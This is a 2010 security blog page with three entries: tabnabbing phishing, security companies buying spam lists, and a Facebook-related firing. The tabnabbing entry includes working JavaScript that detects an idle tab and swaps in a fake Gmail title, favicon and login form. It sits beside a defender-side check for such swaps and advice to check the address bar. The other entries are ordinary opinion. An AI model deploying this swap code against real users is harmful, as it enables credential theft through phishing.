
SANS ISC: InfoSec Handlers Diary Blog



Tabnabbing: a new method for phishing.

Published: 2010-05-25
Last Updated: 2010-05-25 19:33:46 UTC
by donald smith (Version: 1)
5 comment(s)

A new phishing method described by Aza Raskin, creative lead for Firefox.

http://www.security.nl/artikel/33401/1/Duivelse_nieuwe_phishingaanval_gebruikt_tabs.html
I had to run this through Google's translation service, and it did a decent job but not a perfect one.
I modified it somewhat based on my understanding of the issue.
There is a good Flash video that shows how the attack works.

Here are the steps as outlined in the translated version of his description.

The user navigates to the attacker's normal-looking site.

The phishing site detects when the page has lost focus and hasn't been interacted with for a while.

It then replaces the favicon on the tab with the Google favicon, the title with "Gmail: Email from Google", and the page with a Google login look-alike. All of this can be done with a little bit of JavaScript and takes effect instantly.

The user scans their many open tabs; the favicon and title act as a strong visual cue, memory is malleable, and the user will simply think they most likely left a Gmail tab open. When they click back to the fake Gmail tab, they'll see the standard Gmail login page, assume they've been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

This assumes the user had left a Gmail tab open in which they had previously authenticated correctly. Once the user has entered their login information and it has been sent to the attacker's server, the phishing site can redirect them to Gmail; because they were never logged out in the first place, it will appear as if the login was successful.
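The mechanics described above, as an added example that is not code from this diary or from Aza Raskin's demo: the idle-and-unfocused detection and the favicon/title/body swap are reduced to functions that take the document as a parameter, so the same code runs against a constructed fake document offline and against the real DOM in a browser. The defender-side check that follows (a background tab rewriting its own title or favicon) is my own addition, and the hostnames are assumptions.

```javascript
// Added example (not SANS ISC's or Aza Raskin's code): tabnabbing mechanics
// as testable functions, plus a defender-side check. Hostnames are assumptions.

// Lookalike identity the attacker swaps in (constructed sample values;
// the favicon URL points at a hypothetical attacker-controlled host).
const GMAIL_LOOKALIKE = {
  favicon: 'https://attacker.example/gmail-lookalike.ico',
  title: 'Gmail: Email from Google',
  bodyHtml: '<form id="fake-login"><input name="Email"><input name="Passwd" type="password"></form>',
};

// Tracks whether the tab has lost focus and how long it has been idle.
// Timestamps (ms) are passed in so the logic is deterministic and testable.
function createIdleDetector(idleMs) {
  let focused = true;
  let lastActivity = 0;
  return {
    onFocus(now) { focused = true; lastActivity = now; },
    onBlur(now) { focused = false; lastActivity = now; },
    onActivity(now) { lastActivity = now; },
    // True once the page is unfocused AND untouched for at least idleMs.
    shouldSwap(now) { return !focused && now - lastActivity >= idleMs; },
  };
}

// Swaps the three cues the diary names: favicon, title and page body.
// Returns the originals so the caller can restore them.
function swapTabIdentity(doc, identity) {
  const icon = doc.querySelector('link[rel~="icon"]');
  const original = { favicon: icon ? icon.href : null, title: doc.title, bodyHtml: doc.body.innerHTML };
  if (icon) icon.href = identity.favicon;
  doc.title = identity.title;
  doc.body.innerHTML = identity.bodyHtml;
  return original;
}

function snapshot(doc) {
  const icon = doc.querySelector('link[rel~="icon"]');
  return { title: doc.title, favicon: icon ? icon.href : null };
}

// Defender side: compare snapshots taken while document.hidden is true
// (in an extension, from a MutationObserver on <head>). Returns the cues
// that changed in the background, or null when nothing suspicious happened.
function detectBackgroundSwap(hidden, before, after) {
  if (!hidden) return null;
  const changed = [];
  if (before.title !== after.title) changed.push('title');
  if (before.favicon !== after.favicon) changed.push('favicon');
  return changed.length ? changed : null;
}

// Constructed stand-in for a browser document, so the example runs offline.
function makeFakeDocument() {
  const icon = { rel: 'icon', href: 'https://innocent.example/favicon.ico' };
  return {
    hidden: false,
    title: 'Innocent looking page',
    body: { innerHTML: '<h1>Welcome</h1>' },
    querySelector(selector) { return selector.includes('icon') ? icon : null; },
  };
}

// Real-browser wiring (not exercised offline): focus/blur and user input feed
// the detector, a timer polls it, and the swap fires once. Call it yourself
// with (window, document, GMAIL_LOOKALIKE, 5000) in a browser to see the effect.
function installTabnabber(win, doc, identity, idleMs) {
  const detector = createIdleDetector(idleMs);
  win.addEventListener('blur', () => detector.onBlur(Date.now()));
  win.addEventListener('focus', () => detector.onFocus(Date.now()));
  for (const ev of ['mousemove', 'keydown', 'scroll']) {
    doc.addEventListener(ev, () => detector.onActivity(Date.now()));
  }
  const timer = win.setInterval(() => {
    if (detector.shouldSwap(Date.now())) {
      win.clearInterval(timer);
      swapTabIdentity(doc, identity);
    }
  }, 1000);
}

// Walkthrough on the fake document: the user leaves the tab at t=0, the page
// waits out a 5 s idle threshold, swaps, and the defender check flags it.
function runDemo() {
  const doc = makeFakeDocument();
  const detector = createIdleDetector(5000);
  detector.onBlur(0);
  const swappedTooEarly = detector.shouldSwap(3000);   // false: only 3 s idle
  const swappedAfterIdle = detector.shouldSwap(6000);  // true: 6 s idle, unfocused
  doc.hidden = true;
  const before = snapshot(doc);
  const original = swapTabIdentity(doc, GMAIL_LOOKALIKE);
  const after = snapshot(doc);
  return {
    swappedTooEarly,
    swappedAfterIdle,
    titleAfter: doc.title,
    faviconAfter: after.favicon,
    originalTitle: original.title,
    flagged: detectBackgroundSwap(doc.hidden, before, after),
  };
}

console.log(JSON.stringify(runDemo()));
```

The one cue the script cannot touch is the URL bar: the swapped tab still shows the attacker's origin, so checking the address before typing credentials defeats the attack. That is also why the defender check only looks at title and favicon: those are the in-page cues the attacker controls, and a change to them while the tab is hidden has no legitimate reason on a login page.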



Security people shouldn't pay the "spam support system" for email lists to send SPAM

Published: 2010-05-25
Last Updated: 2010-05-25 16:51:09 UTC
by donald smith (Version: 1)
4 comment(s)

Yes this is a pet peeve of mine. I am not going to out the various security companies that do this but when I get SPAM from a “security company” I often report them to their ISP for AUP violation and attempt to educate the SPAMMER who sent the SPAM.

I recently replied to one of the many such SPAMs I received.

They were advertising a Security & Risk Management Summit taking place in Washington, DC.
I asked how they got my email address and was told they buy their lists from various sources. I explained that by buying those lists they were feeding the spam support system. They didn't respond to that comment, so either they already knew and don't care, or they felt it was justifiable.

I recommended that they ONLY use doubly opted-in lists (ones that you opt in to and then get a verification email sent to you, to ensure someone else didn't opt you in).

They did provide an opt-out option and, when confronted, stated that they were CAN-SPAM compliant. If you're a security company and you send me SPAM, expect me to respond and request termination of your service for AUP violation!




Facebook "joke" leads to firing.

Published: 2010-05-25
Last Updated: 2010-05-25 16:36:09 UTC
by donald smith (Version: 1)
10 comment(s)

From: 

http://www.news.com.au/breaking-news/firing-dispatcher-for-facebook-drug-joke-was-right-wisconsin-council-claims/story-e6frfku0-1225870794794

“A CITY council in Wisconsin defended its decision to fire a Police and Fire Department dispatcher who joked about drug addiction on her Facebook page.”

The arbitrator said the dispatcher could come back after a 30-day suspension, but the police chief appears to believe her joke was so inappropriate as to be “an embarrassment to the city”.
Personally, this seems a bit extreme; however, social networking users should be aware that investigating employees' Facebook pages is becoming more common.



Keywords: facebook firing